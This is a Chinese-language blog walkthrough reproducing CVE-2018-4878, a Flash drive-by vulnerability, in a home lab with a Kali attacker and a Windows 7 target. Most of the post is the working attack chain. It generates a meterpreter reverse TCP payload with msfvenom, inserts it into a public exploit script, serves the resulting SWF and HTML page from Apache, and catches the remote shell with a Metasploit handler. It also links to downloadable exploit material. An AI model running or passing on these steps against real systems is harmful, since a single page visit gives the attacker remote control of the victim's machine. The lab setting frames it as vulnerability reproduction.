开篇闲聊:
写了一篇,意犹未尽,然后决定再来一篇哈哈。
漏洞概述:
CVE-2018-4878是一个通杀Flash 28以前版本的漏洞,这个的威力更强,即靶机点击进入一个页面即可瞬间被攻陷!
![](https://img.haomeiwen.com/i14808824/451e8a3d8fc790f6.png)
复现环境:
kail linux
Win7(我的Win10 Flash版本到31了。。。)
这里我引用一位大佬的复现素材,整理的很好!(链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li)
复现过程:
使用msfvenom生成shell代码
root@wuyou:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.134 lport=8888 -f python>1.txt
root@wuyou:~# cat 1.txt
进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件
将上面msfvenom生成的代码覆盖掉原来的代码:
![](https://img.haomeiwen.com/i14808824/12f2552a1f76ae02.png)
修改下面的路径到自己存放的路径
![](https://img.haomeiwen.com/i14808824/82ff17f9bcc563c1.png)
进入存放的目录,执行命令:
root@wuyou:~/CVE-2018-4878# python cve-2018-4878.py
root@wuyou:~/CVE-2018-4878# ls -l
然后将其中两个文件放入Apache目录中,命令我已经给你们准备好了:
root@wuyou:~/CVE-2018-4878# service apache2 start
root@wuyou:~/CVE-2018-4878# cp index2.html /var/www/html/index2.html
root@wuyou:~/CVE-2018-4878# cp exploit.swf /var/www/html/exploit.swf
此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。
这时开启metasploit
root@wuyou:~# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.190.134
msf exploit(multi/handler) > set lport 8888
msf exploit(multi/handler) > exploit
![](https://img.haomeiwen.com/i14808824/c914dd66081b1898.png)
然后在安装了Flash28的Win7上开启页面192.168.190.134/index2.html
![](https://img.haomeiwen.com/i14808824/f07e0d7f85281d1e.png)
这时渗透机直接获取到Sessions
![](https://img.haomeiwen.com/i14808824/b114e5cae6645de9.png)
大功告成!
那么,怎么查看自己的的Flash版本呢?
这里我给大家推荐我自己的方法,在控制面板里找到程序和功能选项
一般就在第一个左右
![](https://img.haomeiwen.com/i14808824/346161e352aae7f0.png)
网友评论